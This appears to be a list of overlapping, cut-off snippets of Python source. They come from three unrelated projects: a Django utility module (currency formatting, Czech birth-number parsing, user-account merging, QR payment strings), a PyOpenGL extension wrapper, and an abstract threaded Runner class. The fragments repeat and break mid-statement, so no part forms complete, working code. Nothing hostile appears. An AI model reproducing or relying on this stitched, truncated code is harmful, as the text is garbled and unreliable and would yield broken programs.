"for sp in source.leprikon_parents.all(): tp = target.leprikon_parents.filter(first_name=sp.first_name, last_name=sp.last_name).first() if tp: tp = merge_objects(sp,",
"ascii(value): return unicodedata.normalize(\"NFKD\", value).encode(\"ascii\", errors=\"ignore\").decode(\"ascii\") def comma_separated(lst): lst = list(map(smart_text, lst)) if len(lst)",
"import ObjectDoesNotExist from django.db import IntegrityError, transaction from django.urls import reverse_lazy as reverse",
"target.leprikon_billing_info.filter(name=sbi.name).first() if tbi: tbi = merge_objects(sbi, tbi, exclude=(\"id\", \"user\")) tbi.save() else: sbi.user =",
"birth_day_this_year > today: return today.year - birth_date.year - 1 else: return today.year -",
"= 1900 + y else: year = 1800 + y else: year =",
"_ from .conf import settings MALE = \"m\" FEMALE = \"f\" def _get_localeconv():",
"s += \"*CRC32:%x\" % zlib.crc32(s.encode()) return s.upper() def paragraph(text): return mark_safe(f\"<p>{text.strip()}</p>\".replace(\"\\n\", \"<br/>\\n\").replace(\"<br/>\\n<br/>\\n\", \"</p>\\n\\n<p>\"))",
"reverse_lazy as reverse from django.utils.encoding import iri_to_uri, smart_text from django.utils.functional import lazy from",
"smb = smart_text(localeconv[international and \"int_curr_symbol\" or \"currency_symbol\"]) precedes = localeconv[val < 0 and",
"s = \"<\" + s + \">\" smb = smart_text(localeconv[international and \"int_curr_symbol\" or",
"\"p_sign_posn\"] sign = localeconv[val < 0 and \"negative_sign\" or \"positive_sign\"] if sign_pos ==",
"are markers if the sign must be inserted between symbol and value s",
"= \"SPD*1.0*\" + \"*\".join( \"%s:%s\" % (k, unicodedata.normalize(\"NFKD\", str(v).replace(\"*\", \"\")).encode(\"ascii\", \"ignore\").upper().decode()) for k,",
"def currency(val, international=False): \"\"\"Formats val according to the currency settings for current language.\"\"\"",
"day = int(birth_num[4:6]) return date(year, month, day) def get_age(birth_date, today=None): today = today",
"in source.leprikon_parents.all(): tp = target.leprikon_parents.filter(first_name=sp.first_name, last_name=sp.last_name).first() if tp: tp = merge_objects(sp, tp, exclude=(\"id\",",
"and not isinstance(val, int): s += smart_text(localeconv[\"mon_decimal_point\"]) + \"{{:.{}f}}\".format(digits).format(val).split(\".\")[1] # '<' and '>'",
"tp: tp = merge_objects(sp, tp, exclude=(\"id\", \"user\")) tp.save() else: sp.user = target sp.save()",
"if the sign must be inserted between symbol and value s = \"<\"",
"display fraction for non integer values if digits and not isinstance(val, int): s",
"year -= 100 month = int(birth_num[2:4]) % 50 % 20 day = int(birth_num[4:6])",
"0 and \"negative_sign\" or \"positive_sign\"] if sign_pos == 0: s = \"(\" +",
"source.date_joined and target.date_joined else source.date_joined or target.date_joined ) target.last_login = ( max(source.last_login, target.last_login)",
"( max(source.last_login, target.last_login) if source.last_login and target.last_login else source.last_login or target.last_login ) try:",
"source.leprikon_parents.all(): tp = target.leprikon_parents.filter(first_name=sp.first_name, last_name=sp.last_name).first() if tp: tp = merge_objects(sp, tp, exclude=(\"id\", \"user\"))",
"exclude=(\"id\", \"user\", \"birth_num\")) tp.save() else: sp.user = target sp.save() for sp in source.leprikon_parents.all():",
"lc = locale.localeconv() locale.setlocale(locale.LC_ALL, original_locale_name) return lc localeconv = _get_localeconv() # This function",
"+ (separated and \" \" or \"\") + s else: s = s",
"year = 1900 + y else: year = 1800 + y else: year",
"or \"p_sep_by_space\"] if precedes: s = smb + (separated and \" \" or",
"0: s = \"(\" + s + \")\" elif sign_pos == 1: s",
"s += smart_text(localeconv[\"mon_decimal_point\"]) + \"{{:.{}f}}\".format(digits).format(val).split(\".\")[1] # '<' and '>' are markers if the",
"s return s.replace(\"<\", \"\").replace(\">\", \"\").replace(\" \", \"\\u00A0\") def amount_color(amount): if amount > 0:",
"\"\".join([stringset[i % len(stringset)] for i in [ord(x) for x in os.urandom(length)]]) def current_url(request):",
"= list(map(smart_text, lst)) if len(lst) > 2: return _(\", and \").join([\", \".join(lst[:-1]), lst[-1]])",
"support social auth source.social_auth.update(user=target) except AttributeError: pass from .rocketchat import RocketChat RocketChat().merge_users(source, target)",
"if birth_num[2:4] > \"50\" else MALE def get_birth_date(birth_num): birth_num = birth_num.replace(\"/\", \"\") y",
"list(map(smart_text, lst)) if len(lst) > 2: return _(\", and \").join([\", \".join(lst[:-1]), lst[-1]]) else:",
"in source.leprikon_messages.all(): if not target.leprikon_messages.filter(message=mr.message).exists(): mr.recipient = target mr.save() try: # support social",
"\" or \"\") + s else: s = s + (separated and \"",
"else source.last_login or target.last_login ) try: leader = source.leprikon_leader leader.user = target leader.save()",
"locale.locale_alias[settings.LANGUAGE_CODE].split(\".\")[0] + \".UTF-8\" locale.setlocale(locale.LC_ALL, str(locale_name)) lc = locale.localeconv() locale.setlocale(locale.LC_ALL, original_locale_name) return lc localeconv",
"localeconv[val < 0 and \"n_sign_posn\" or \"p_sign_posn\"] sign = localeconv[val < 0 and",
"def get_rand_hash(length=32, stringset=string.ascii_letters + string.digits): return \"\".join([stringset[i % len(stringset)] for i in [ord(x)",
"groups.reverse() s = smart_text(localeconv[\"mon_thousands_sep\"]).join(groups) # display fraction for non integer values if digits",
"0 and \"n_sign_posn\" or \"p_sign_posn\"] sign = localeconv[val < 0 and \"negative_sign\" or",
"re.compile(f\"[?&]{settings.LEPRIKON_PARAM_BACK}=\") def url_with_back(url, url_back): try: query = url_back.split(\"?\")[1] except IndexError: pass else: try:",
"s = \"SPD*1.0*\" + \"*\".join( \"%s:%s\" % (k, unicodedata.normalize(\"NFKD\", str(v).replace(\"*\", \"\")).encode(\"ascii\", \"ignore\").upper().decode()) for",
"locale.setlocale later may be dangerous (It is not thread-safe in most of the",
"according to the currency settings for current language.\"\"\" digits = settings.PRICE_DECIMAL_PLACES # grouping",
"min(source.date_joined, target.date_joined) if source.date_joined and target.date_joined else source.date_joined or target.date_joined ) target.last_login =",
"sp in source.leprikon_parents.all(): tp = target.leprikon_parents.filter(first_name=sp.first_name, last_name=sp.last_name).first() if tp: tp = merge_objects(sp, tp,",
"for sbi in source.leprikon_billing_info.all(): tbi = target.leprikon_billing_info.filter(name=sbi.name).first() if tbi: tbi = merge_objects(sbi, tbi,",
"as reverse from django.utils.encoding import iri_to_uri, smart_text from django.utils.functional import lazy from django.utils.safestring",
"source.delete() def spayd(*items): s = \"SPD*1.0*\" + \"*\".join( \"%s:%s\" % (k, unicodedata.normalize(\"NFKD\", str(v).replace(\"*\",",
"% 100: year -= 100 month = int(birth_num[2:4]) % 50 % 20 day",
"This function loads localeconv during module load. It is necessary, because using locale.setlocale",
"i in [ord(x) for x in os.urandom(length)]]) def current_url(request): if request.META[\"QUERY_STRING\"]: return \"{}?{}\".format(request.path,",
"*args, **kwargs): return url_with_back(reverse(*args, **kwargs), current_url(request)) def get_gender(birth_num): return FEMALE if birth_num[2:4] >",
"/ 100) * 100 + y if y > date.today().year % 100: year",
"request.META[\"QUERY_STRING\"]: return \"{}?{}\".format(request.path, request.META[\"QUERY_STRING\"]) else: return request.path def url_back(request): return request.POST.get( settings.LEPRIKON_PARAM_BACK, request.GET.get(",
"date(year, month, day) def get_age(birth_date, today=None): today = today or date.today() try: birth_day_this_year",
"sign_pos == 2: s = s + sign elif sign_pos == 3: s",
"settings.LEPRIKON_COLOR_NEGATIVE else: return settings.LEPRIKON_COLOR_ZERO def ascii(value): return unicodedata.normalize(\"NFKD\", value).encode(\"ascii\", errors=\"ignore\").decode(\"ascii\") def comma_separated(lst): lst",
"**kwargs): return url_with_back(reverse(*args, **kwargs), current_url(request)) def get_gender(birth_num): return FEMALE if birth_num[2:4] > \"50\"",
"> \"50\" else MALE def get_birth_date(birth_num): birth_num = birth_num.replace(\"/\", \"\") y = int(birth_num[:2])",
"(It is not thread-safe in most of the implementations.) \"\"\" original_locale_name = locale.setlocale(locale.LC_ALL)",
"9: # before 1954 if y < 54: year = 1900 + y",
"from datetime import date from urllib.parse import parse_qs, urlencode from django.core.exceptions import ObjectDoesNotExist",
"import iri_to_uri, smart_text from django.utils.functional import lazy from django.utils.safestring import mark_safe from django.utils.translation",
"attributes = attributes or [f.name for f in source._meta.fields if f.name not in",
"in source._meta.fields if f.name not in exclude] for attr in attributes: if not",
"import parse_qs, urlencode from django.core.exceptions import ObjectDoesNotExist from django.db import IntegrityError, transaction from",
"1900 + y else: year = 1800 + y else: year = int(date.today().year",
"= int(date.today().year / 100) * 100 + y if y > date.today().year %",
"last_name=sp.last_name).first() if tp: tp = merge_objects(sp, tp, exclude=(\"id\", \"user\")) tp.save() else: sp.user =",
"f in source._meta.fields if f.name not in exclude] for attr in attributes: if",
"nothing specified; # this should be the most fitting sign position s =",
"birth_day_this_year = date(today.year, birth_date.month, birth_date.day) except ValueError: birth_day_this_year = date(today.year, birth_date.month + 1,",
"1800 + y else: year = int(date.today().year / 100) * 100 + y",
"current language.\"\"\" digits = settings.PRICE_DECIMAL_PLACES # grouping groups = [] s = str(abs(int(val)))",
"in source.leprikon_billing_info.all(): tbi = target.leprikon_billing_info.filter(name=sbi.name).first() if tbi: tbi = merge_objects(sbi, tbi, exclude=(\"id\", \"user\"))",
"-= 100 month = int(birth_num[2:4]) % 50 % 20 day = int(birth_num[4:6]) return",
"try: # support social auth source.social_auth.update(user=target) except AttributeError: pass from .rocketchat import RocketChat",
"merge_objects(source, target, attributes=None, exclude=[]): attributes = attributes or [f.name for f in source._meta.fields",
"spayd(*items): s = \"SPD*1.0*\" + \"*\".join( \"%s:%s\" % (k, unicodedata.normalize(\"NFKD\", str(v).replace(\"*\", \"\")).encode(\"ascii\", \"ignore\").upper().decode())",
"settings.PRICE_DECIMAL_PLACES # grouping groups = [] s = str(abs(int(val))) for interval in locale._grouping_intervals(localeconv[\"mon_grouping\"]):",
"< 0 and \"n_sign_posn\" or \"p_sign_posn\"] sign = localeconv[val < 0 and \"negative_sign\"",
"return _(\", and \").join(lst) def get_rand_hash(length=32, stringset=string.ascii_letters + string.digits): return \"\".join([stringset[i % len(stringset)]",
"), ) recursive_back_splitter = re.compile(f\"[?&]{settings.LEPRIKON_PARAM_BACK}=\") def url_with_back(url, url_back): try: query = url_back.split(\"?\")[1] except",
"target.leprikon_participants.filter(birth_num=sp.birth_num).first() if tp: tp = merge_objects(sp, tp, exclude=(\"id\", \"user\", \"birth_num\")) tp.save() else: sp.user",
"django.utils.safestring import mark_safe from django.utils.translation import ugettext_lazy as _ from .conf import settings",
"% len(stringset)] for i in [ord(x) for x in os.urandom(length)]]) def current_url(request): if",
"in ( \"user\", \"created_by\", \"approved_by\", \"payment_requested_by\", \"refund_offered_by\", \"cancelation_requested_by\", \"canceled_by\", ): SubjectRegistration.objects.filter(**{attr: source}).update(**{attr: target})",
"s + \">\" smb = smart_text(localeconv[international and \"int_curr_symbol\" or \"currency_symbol\"]) precedes = localeconv[val",
"for non integer values if digits and not isinstance(val, int): s += smart_text(localeconv[\"mon_decimal_point\"])",
"settings.LEPRIKON_PARAM_BACK, reverse(\"leprikon:summary\"), ), ) recursive_back_splitter = re.compile(f\"[?&]{settings.LEPRIKON_PARAM_BACK}=\") def url_with_back(url, url_back): try: query =",
"tp = merge_objects(sp, tp, exclude=(\"id\", \"user\", \"birth_num\")) tp.save() else: sp.user = target sp.save()",
"= merge_objects(sbi, tbi, exclude=(\"id\", \"user\")) tbi.save() else: sbi.user = target sbi.save() for mr",
"def amount_color(amount): if amount > 0: return settings.LEPRIKON_COLOR_POSITIVE elif amount < 0: return",
"in sorted(items) ) s += \"*CRC32:%x\" % zlib.crc32(s.encode()) return s.upper() def paragraph(text): return",
"locale import os import re import string import unicodedata import zlib from datetime",
"url_with_back(reverse(*args, **kwargs), current_url(request)) def get_gender(birth_num): return FEMALE if birth_num[2:4] > \"50\" else MALE",
"leaders raise for attr in ( \"user\", \"created_by\", \"approved_by\", \"payment_requested_by\", \"refund_offered_by\", \"cancelation_requested_by\", \"canceled_by\",",
"= localeconv[val < 0 and \"negative_sign\" or \"positive_sign\"] if sign_pos == 0: s",
"\"<\" + s + \">\" smb = smart_text(localeconv[international and \"int_curr_symbol\" or \"currency_symbol\"]) precedes",
"return today.year - birth_date.year def first_upper(s): return s[0].upper() + s[1:] if s else",
"import ugettext_lazy as _ from .conf import settings MALE = \"m\" FEMALE =",
"lazy from django.utils.safestring import mark_safe from django.utils.translation import ugettext_lazy as _ from .conf",
"python's standard locale.currency(). def currency(val, international=False): \"\"\"Formats val according to the currency settings",
"import string import unicodedata import zlib from datetime import date from urllib.parse import",
"to the currency settings for current language.\"\"\" digits = settings.PRICE_DECIMAL_PLACES # grouping groups",
"locale._grouping_intervals(localeconv[\"mon_grouping\"]): if not s: break groups.append(s[-interval:]) s = s[:-interval] if s: groups.append(s) groups.reverse()",
"\"\\u00A0\") def amount_color(amount): if amount > 0: return settings.LEPRIKON_COLOR_POSITIVE elif amount < 0:",
"tp: tp = merge_objects(sp, tp, exclude=(\"id\", \"user\", \"birth_num\")) tp.save() else: sp.user = target",
"if sign_pos == 0: s = \"(\" + s + \")\" elif sign_pos",
"merge_objects(sbi, tbi, exclude=(\"id\", \"user\")) tbi.save() else: sbi.user = target sbi.save() for mr in",
"request.POST.get( settings.LEPRIKON_PARAM_BACK, request.GET.get( settings.LEPRIKON_PARAM_BACK, reverse(\"leprikon:summary\"), ), ) recursive_back_splitter = re.compile(f\"[?&]{settings.LEPRIKON_PARAM_BACK}=\") def url_with_back(url, url_back):",
"tp = merge_objects(sp, tp, exclude=(\"id\", \"user\")) tp.save() else: sp.user = target sp.save() for",
"if nothing specified; # this should be the most fitting sign position s",
"\"n_sign_posn\" or \"p_sign_posn\"] sign = localeconv[val < 0 and \"negative_sign\" or \"positive_sign\"] if",
"sign_pos == 3: s = s.replace(\"<\", sign) elif sign_pos == 4: s =",
"s else \"\" def merge_objects(source, target, attributes=None, exclude=[]): attributes = attributes or [f.name",
"ValueError: birth_day_this_year = date(today.year, birth_date.month + 1, 1) if birth_day_this_year > today: return",
"parse_qs, urlencode from django.core.exceptions import ObjectDoesNotExist from django.db import IntegrityError, transaction from django.urls",
"source.social_auth.update(user=target) except AttributeError: pass from .rocketchat import RocketChat RocketChat().merge_users(source, target) source.delete() def spayd(*items):",
".conf import settings MALE = \"m\" FEMALE = \"f\" def _get_localeconv(): \"\"\" This",
"y < 54: year = 1900 + y else: year = 1800 +",
"s = \"(\" + s + \")\" elif sign_pos == 1: s ="
] |
[
"import extensions, wrapper import ctypes from OpenGL.raw.GL import _types, _glgets from OpenGL.raw.GL.NV.texture_expand_normal import",
"allows applications to easily encode signed data into unsigned texture formats. The functionality",
"contained signed data (in the range [-1,+1]). This allows applications to easily encode",
"to provide a more Python-friendly API Overview (from the spec) This extension provides",
"is nearly identical to the EXPAND_NORMAL_NV remapping mode provided in the NV_register_combiners extension,",
"remapping mode provided in the NV_register_combiners extension, although it applies even if register",
"arrays from OpenGL import extensions, wrapper import ctypes from OpenGL.raw.GL import _types, _glgets",
"boolean indicating whether this extension is available''' from OpenGL import extensions return extensions.hasGLExtension(",
"range [0,1]) can be treated as though they contained signed data (in the",
"OpenGL.raw.GL import _types, _glgets from OpenGL.raw.GL.NV.texture_expand_normal import * from OpenGL.raw.GL.NV.texture_expand_normal import _EXTENSION_NAME def",
"constant, arrays from OpenGL import extensions, wrapper import ctypes from OpenGL.raw.GL import _types,",
"applies even if register combiners are used. The official definition of this extension",
"(in the range [-1,+1]). This allows applications to easily encode signed data into",
"This module customises the behaviour of the OpenGL.raw.GL.NV.texture_expand_normal to provide a more Python-friendly",
"signed data (in the range [-1,+1]). This allows applications to easily encode signed",
"from OpenGL.raw.GL.NV.texture_expand_normal import * from OpenGL.raw.GL.NV.texture_expand_normal import _EXTENSION_NAME def glInitTextureExpandNormalNV(): '''Return boolean indicating",
"provide a more Python-friendly API Overview (from the spec) This extension provides a",
"this extension is nearly identical to the EXPAND_NORMAL_NV remapping mode provided in the",
"unsigned texture components (in the range [0,1]) can be treated as though they",
"provided in the NV_register_combiners extension, although it applies even if register combiners are",
"mode provided in the NV_register_combiners extension, although it applies even if register combiners",
"spec) This extension provides a remapping mode where unsigned texture components (in the",
"texture components (in the range [0,1]) can be treated as though they contained",
"available''' from OpenGL import extensions return extensions.hasGLExtension( _EXTENSION_NAME ) ### END AUTOGENERATED SECTION",
"this extension is available''' from OpenGL import extensions return extensions.hasGLExtension( _EXTENSION_NAME ) ###",
"[-1,+1]). This allows applications to easily encode signed data into unsigned texture formats.",
"Overview (from the spec) This extension provides a remapping mode where unsigned texture",
"indicating whether this extension is available''' from OpenGL import extensions return extensions.hasGLExtension( _EXTENSION_NAME",
"remapping mode where unsigned texture components (in the range [0,1]) can be treated",
"customises the behaviour of the OpenGL.raw.GL.NV.texture_expand_normal to provide a more Python-friendly API Overview",
"the spec) This extension provides a remapping mode where unsigned texture components (in",
"* from OpenGL.raw.GL.NV.texture_expand_normal import _EXTENSION_NAME def glInitTextureExpandNormalNV(): '''Return boolean indicating whether this extension",
"extension provides a remapping mode where unsigned texture components (in the range [0,1])",
"_EXTENSION_NAME def glInitTextureExpandNormalNV(): '''Return boolean indicating whether this extension is available''' from OpenGL",
"in the NV_register_combiners extension, although it applies even if register combiners are used.",
"This extension provides a remapping mode where unsigned texture components (in the range",
"behaviour of the OpenGL.raw.GL.NV.texture_expand_normal to provide a more Python-friendly API Overview (from the",
"even if register combiners are used. The official definition of this extension is",
"components (in the range [0,1]) can be treated as though they contained signed",
"(from the spec) This extension provides a remapping mode where unsigned texture components",
"applications to easily encode signed data into unsigned texture formats. The functionality of",
"import _types, _glgets from OpenGL.raw.GL.NV.texture_expand_normal import * from OpenGL.raw.GL.NV.texture_expand_normal import _EXTENSION_NAME def glInitTextureExpandNormalNV():",
"from OpenGL.raw.GL import _types, _glgets from OpenGL.raw.GL.NV.texture_expand_normal import * from OpenGL.raw.GL.NV.texture_expand_normal import _EXTENSION_NAME",
"OpenGL.raw.GL.NV.texture_expand_normal import * from OpenGL.raw.GL.NV.texture_expand_normal import _EXTENSION_NAME def glInitTextureExpandNormalNV(): '''Return boolean indicating whether",
"as though they contained signed data (in the range [-1,+1]). This allows applications",
"from OpenGL import extensions, wrapper import ctypes from OpenGL.raw.GL import _types, _glgets from",
"OpenGL.raw.GL.NV.texture_expand_normal to provide a more Python-friendly API Overview (from the spec) This extension",
"The official definition of this extension is available here: http://www.opengl.org/registry/specs/NV/texture_expand_normal.txt ''' from OpenGL",
"range [-1,+1]). This allows applications to easily encode signed data into unsigned texture",
"extensions, wrapper import ctypes from OpenGL.raw.GL import _types, _glgets from OpenGL.raw.GL.NV.texture_expand_normal import *",
"more Python-friendly API Overview (from the spec) This extension provides a remapping mode",
"extension is available''' from OpenGL import extensions return extensions.hasGLExtension( _EXTENSION_NAME ) ### END",
"be treated as though they contained signed data (in the range [-1,+1]). This",
"are used. The official definition of this extension is available here: http://www.opengl.org/registry/specs/NV/texture_expand_normal.txt '''",
"here: http://www.opengl.org/registry/specs/NV/texture_expand_normal.txt ''' from OpenGL import platform, constant, arrays from OpenGL import extensions,",
"although it applies even if register combiners are used. The official definition of",
"into unsigned texture formats. The functionality of this extension is nearly identical to",
"whether this extension is available''' from OpenGL import extensions return extensions.hasGLExtension( _EXTENSION_NAME )",
"a remapping mode where unsigned texture components (in the range [0,1]) can be",
"'''OpenGL extension NV.texture_expand_normal This module customises the behaviour of the OpenGL.raw.GL.NV.texture_expand_normal to provide",
"glInitTextureExpandNormalNV(): '''Return boolean indicating whether this extension is available''' from OpenGL import extensions",
"extension is available here: http://www.opengl.org/registry/specs/NV/texture_expand_normal.txt ''' from OpenGL import platform, constant, arrays from",
"extension, although it applies even if register combiners are used. The official definition",
"the NV_register_combiners extension, although it applies even if register combiners are used. The",
"_glgets from OpenGL.raw.GL.NV.texture_expand_normal import * from OpenGL.raw.GL.NV.texture_expand_normal import _EXTENSION_NAME def glInitTextureExpandNormalNV(): '''Return boolean",
"the OpenGL.raw.GL.NV.texture_expand_normal to provide a more Python-friendly API Overview (from the spec) This",
"The functionality of this extension is nearly identical to the EXPAND_NORMAL_NV remapping mode",
"the range [0,1]) can be treated as though they contained signed data (in",
"can be treated as though they contained signed data (in the range [-1,+1]).",
"the range [-1,+1]). This allows applications to easily encode signed data into unsigned",
"combiners are used. The official definition of this extension is available here: http://www.opengl.org/registry/specs/NV/texture_expand_normal.txt",
"of this extension is nearly identical to the EXPAND_NORMAL_NV remapping mode provided in",
"easily encode signed data into unsigned texture formats. The functionality of this extension",
"OpenGL import platform, constant, arrays from OpenGL import extensions, wrapper import ctypes from",
"API Overview (from the spec) This extension provides a remapping mode where unsigned",
"[0,1]) can be treated as though they contained signed data (in the range",
"'''Return boolean indicating whether this extension is available''' from OpenGL import extensions return",
"to easily encode signed data into unsigned texture formats. The functionality of this",
"where unsigned texture components (in the range [0,1]) can be treated as though",
"''' from OpenGL import platform, constant, arrays from OpenGL import extensions, wrapper import",
"provides a remapping mode where unsigned texture components (in the range [0,1]) can",
"encode signed data into unsigned texture formats. The functionality of this extension is",
"used. The official definition of this extension is available here: http://www.opengl.org/registry/specs/NV/texture_expand_normal.txt ''' from",
"texture formats. The functionality of this extension is nearly identical to the EXPAND_NORMAL_NV",
"http://www.opengl.org/registry/specs/NV/texture_expand_normal.txt ''' from OpenGL import platform, constant, arrays from OpenGL import extensions, wrapper",
"mode where unsigned texture components (in the range [0,1]) can be treated as",
"EXPAND_NORMAL_NV remapping mode provided in the NV_register_combiners extension, although it applies even if",
"if register combiners are used. The official definition of this extension is available",
"signed data into unsigned texture formats. The functionality of this extension is nearly",
"ctypes from OpenGL.raw.GL import _types, _glgets from OpenGL.raw.GL.NV.texture_expand_normal import * from OpenGL.raw.GL.NV.texture_expand_normal import",
"this extension is available here: http://www.opengl.org/registry/specs/NV/texture_expand_normal.txt ''' from OpenGL import platform, constant, arrays",
"from OpenGL import platform, constant, arrays from OpenGL import extensions, wrapper import ctypes",
"def glInitTextureExpandNormalNV(): '''Return boolean indicating whether this extension is available''' from OpenGL import",
"import platform, constant, arrays from OpenGL import extensions, wrapper import ctypes from OpenGL.raw.GL",
"wrapper import ctypes from OpenGL.raw.GL import _types, _glgets from OpenGL.raw.GL.NV.texture_expand_normal import * from",
"This allows applications to easily encode signed data into unsigned texture formats. The",
"extension is nearly identical to the EXPAND_NORMAL_NV remapping mode provided in the NV_register_combiners",
"module customises the behaviour of the OpenGL.raw.GL.NV.texture_expand_normal to provide a more Python-friendly API",
"to the EXPAND_NORMAL_NV remapping mode provided in the NV_register_combiners extension, although it applies",
"NV.texture_expand_normal This module customises the behaviour of the OpenGL.raw.GL.NV.texture_expand_normal to provide a more",
"formats. The functionality of this extension is nearly identical to the EXPAND_NORMAL_NV remapping",
"OpenGL import extensions, wrapper import ctypes from OpenGL.raw.GL import _types, _glgets from OpenGL.raw.GL.NV.texture_expand_normal",
"data (in the range [-1,+1]). This allows applications to easily encode signed data",
"the behaviour of the OpenGL.raw.GL.NV.texture_expand_normal to provide a more Python-friendly API Overview (from",
"OpenGL.raw.GL.NV.texture_expand_normal import _EXTENSION_NAME def glInitTextureExpandNormalNV(): '''Return boolean indicating whether this extension is available'''",
"is available''' from OpenGL import extensions return extensions.hasGLExtension( _EXTENSION_NAME ) ### END AUTOGENERATED",
"functionality of this extension is nearly identical to the EXPAND_NORMAL_NV remapping mode provided",
"identical to the EXPAND_NORMAL_NV remapping mode provided in the NV_register_combiners extension, although it",
"register combiners are used. The official definition of this extension is available here:",
"platform, constant, arrays from OpenGL import extensions, wrapper import ctypes from OpenGL.raw.GL import",
"a more Python-friendly API Overview (from the spec) This extension provides a remapping",
"they contained signed data (in the range [-1,+1]). This allows applications to easily",
"of this extension is available here: http://www.opengl.org/registry/specs/NV/texture_expand_normal.txt ''' from OpenGL import platform, constant,",
"_types, _glgets from OpenGL.raw.GL.NV.texture_expand_normal import * from OpenGL.raw.GL.NV.texture_expand_normal import _EXTENSION_NAME def glInitTextureExpandNormalNV(): '''Return",
"it applies even if register combiners are used. The official definition of this",
"from OpenGL.raw.GL.NV.texture_expand_normal import _EXTENSION_NAME def glInitTextureExpandNormalNV(): '''Return boolean indicating whether this extension is",
"definition of this extension is available here: http://www.opengl.org/registry/specs/NV/texture_expand_normal.txt ''' from OpenGL import platform,",
"(in the range [0,1]) can be treated as though they contained signed data",
"NV_register_combiners extension, although it applies even if register combiners are used. The official",
"import ctypes from OpenGL.raw.GL import _types, _glgets from OpenGL.raw.GL.NV.texture_expand_normal import * from OpenGL.raw.GL.NV.texture_expand_normal",
"extension NV.texture_expand_normal This module customises the behaviour of the OpenGL.raw.GL.NV.texture_expand_normal to provide a",
"the EXPAND_NORMAL_NV remapping mode provided in the NV_register_combiners extension, although it applies even",
"unsigned texture formats. The functionality of this extension is nearly identical to the",
"data into unsigned texture formats. The functionality of this extension is nearly identical",
"of the OpenGL.raw.GL.NV.texture_expand_normal to provide a more Python-friendly API Overview (from the spec)",
"nearly identical to the EXPAND_NORMAL_NV remapping mode provided in the NV_register_combiners extension, although",
"Python-friendly API Overview (from the spec) This extension provides a remapping mode where",
"is available here: http://www.opengl.org/registry/specs/NV/texture_expand_normal.txt ''' from OpenGL import platform, constant, arrays from OpenGL",
"available here: http://www.opengl.org/registry/specs/NV/texture_expand_normal.txt ''' from OpenGL import platform, constant, arrays from OpenGL import",
"import _EXTENSION_NAME def glInitTextureExpandNormalNV(): '''Return boolean indicating whether this extension is available''' from",
"official definition of this extension is available here: http://www.opengl.org/registry/specs/NV/texture_expand_normal.txt ''' from OpenGL import",
"import * from OpenGL.raw.GL.NV.texture_expand_normal import _EXTENSION_NAME def glInitTextureExpandNormalNV(): '''Return boolean indicating whether this",
"treated as though they contained signed data (in the range [-1,+1]). This allows",
"though they contained signed data (in the range [-1,+1]). This allows applications to"
] |
[
"base class, from which all Runners are derived. \"\"\" def __init__(self, callback, callback_context):",
"event is always END. # # The normal event sequence, which relates to",
"return elif self._runner_state in [RunnerState.COMPLETE, RunnerState.END]: print('Ignoring (Runner already gone). {%s}' % self._runner_uuid)",
"elif self._runner_state in [RunnerState.COMPLETE, RunnerState.END]: print('Ignoring (Runner already gone). {%s}' % self._runner_uuid) return",
"- in response to a stop() STOPPED = auto() # The runner has",
"created, runs, completes and is then # automatically deleted is represented by the",
"class RunnerState(Enum): \"\"\"Runner execution states. \"\"\" # The first event is always BEGIN.",
"# # The normal event sequence, which relates to a runner # that's",
"from enum import Enum, auto, unique import threading import uuid RUNNER_IMAGE = 'alanbchristie/pydatalister'",
"block. \"\"\" assert self._runner_state is None self._set_runner_state(RunnerState.BEGIN) def end(self): \"\"\"Stops the Runner. This",
"initial state (assigned in begin()) PREPARING = auto() # The Runner is preparing",
"- it's # the responsibility of the implementing class. self._stopping = True print('End",
"= auto() # The Runner is Running COMPLETE = auto() # The Runner",
"self._state_callback(rso, self._callback_context) @abstractmethod def begin(self): \"\"\"Starts the Runner. The state_callback will be supplied",
"metaclass=ABCMeta): \"\"\"The ``Runner`` base class, from which all Runners are derived. \"\"\" def",
"(Runner already gone). {%s}' % self._runner_uuid) return self._set_runner_state(RunnerState.STOPPING) # Just set the 'stopping'",
"abstract _Runner_ module. \"\"\" from abc import ABCMeta, abstractmethod from collections import namedtuple",
"This method must only be called once. This method must not block. \"\"\"",
"% self._runner_uuid) if self._stopping: print('Ignoring (already in progress). {%s}' % self._runner_uuid) return elif",
"lifetime and are normally left to complete naturally. If the Runner is still",
"to be prematurely stopped. Runners have a built-in lifetime and are normally left",
"not block. \"\"\" assert self._runner_state is None self._set_runner_state(RunnerState.BEGIN) def end(self): \"\"\"Stops the Runner.",
"'context', 'msg']) class Runner(threading.Thread, metaclass=ABCMeta): \"\"\"The ``Runner`` base class, from which all Runners",
"def end(self): \"\"\"Stops the Runner. This method should be called only of a",
"'stopping' field (and change the state). # This should cause the main thread",
"threading.Lock() print('New Runner() {%s}' % self._runner_uuid) def _set_runner_state(self, runner_state, msg=None): \"\"\"Sets the runner",
"preparing to run RUNNING = auto() # The Runner is Running COMPLETE =",
"enum import Enum, auto, unique import threading import uuid RUNNER_IMAGE = 'alanbchristie/pydatalister' RUNNER_TAG",
"- RUNNING - COMPLETE - END BEGIN = auto() # The Runner initial",
"= auto() # The Runner initial state (assigned in begin()) PREPARING = auto()",
"is Running COMPLETE = auto() # The Runner has completed its actions (naturally)",
"#!/usr/bin/env python3 \"\"\"An abstract _Runner_ module. \"\"\" from abc import ABCMeta, abstractmethod from",
"RunnerState (%s) {%s}' % (runner_state, self._runner_uuid)) # Inform the user of each state",
"self._state_callback = callback self._callback_context = callback_context self._runner_state = None self._stopping = False self._runner_uuid",
"= callback_context self._runner_state = None self._stopping = False self._runner_uuid = uuid.uuid4() # A",
"runner # that's successfully created, runs, completes and is then # automatically deleted",
"None self._set_runner_state(RunnerState.BEGIN) def end(self): \"\"\"Stops the Runner. This method should be called only",
"= auto() # The Runner has completed its actions (naturally) STOPPING = auto()",
"callback method. assert self._state_callback rso = RunnerStateTuple(runner_state, self._callback_context, msg) self._state_callback(rso, self._callback_context) @abstractmethod def",
"class, from which all Runners are derived. \"\"\" def __init__(self, callback, callback_context): \"\"\"The",
"Runner is still running this method introduces the ``RunnerState`` values of ``STOPPING`` and",
"# BEGIN - PREPARING - RUNNING - COMPLETE - END BEGIN = auto()",
"of a Runner is to be prematurely stopped. Runners have a built-in lifetime",
"as the first argument # in the callback method. assert self._state_callback rso =",
"There has been a problem END = auto() # The last event, issued",
"callback, callback_context): \"\"\"The basic Runner initialser. \"\"\" threading.Thread.__init__(self) assert callable(callback) self._state_callback = callback",
"abc import ABCMeta, abstractmethod from collections import namedtuple from enum import Enum, auto,",
"(already in progress). {%s}' % self._runner_uuid) return elif self._runner_state in [RunnerState.COMPLETE, RunnerState.END]: print('Ignoring",
